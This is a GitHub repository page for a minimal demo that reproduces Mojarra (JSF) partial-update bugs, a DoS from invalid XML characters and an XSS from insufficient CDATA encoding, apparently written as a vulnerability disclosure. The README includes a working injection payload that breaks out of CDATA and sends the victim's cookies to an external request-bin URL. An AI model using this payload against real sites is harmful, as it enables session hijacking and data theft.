Skip to content
/ mojarra-ajax Public

Minimal demo to reproduce some issues with mojarra partial update

License

MIT license
0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

cnsgithub/mojarra-ajax

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
src/main
src/main
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

mojarra-ajax

Minimal demo to reproduce some issues with mojarra partial update.

To reproduce just run

mvn package wildfly:run

and wait for the server to start up.

Issue: Ajax update fails due to invalid characters in response XML (DoS)

Open the url http://localhost:8080/ajax/index.xhtml.

It also works for user supplied inputs, open http://localhost:8080/ajax/input.xhtml and enter the \u000C character into the input field.

Workaround is available at https://github.com/cnsgithub/mojarra-ajax/blob/master/src/main/java/main/IllegalXmlCharactersFilter.java.

Pull request eclipse-ee4j/mojarra#4517 has been closed unmerged.

Issue: Partial rendering: insufficient CDATA encoding (XSS)

Open the url http://localhost:8080/ajax/issue4392.xhtml, enter ]]> and click at the button to see the XML parser crashing (denial of service).

However, this vulnerability might also be used to inject arbitrary javascript (XSS). Just enter ]]></update><eval><![CDATA[window.open("https://postb.in/Lsmfz95D?cookie="+encodeURIComponent(document.cookie));]]></eval><update><![CDATA[ and see how your cookies have been sent to https://postb.in/b/Lsmfz95D.

About

Minimal demo to reproduce some issues with mojarra partial update

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages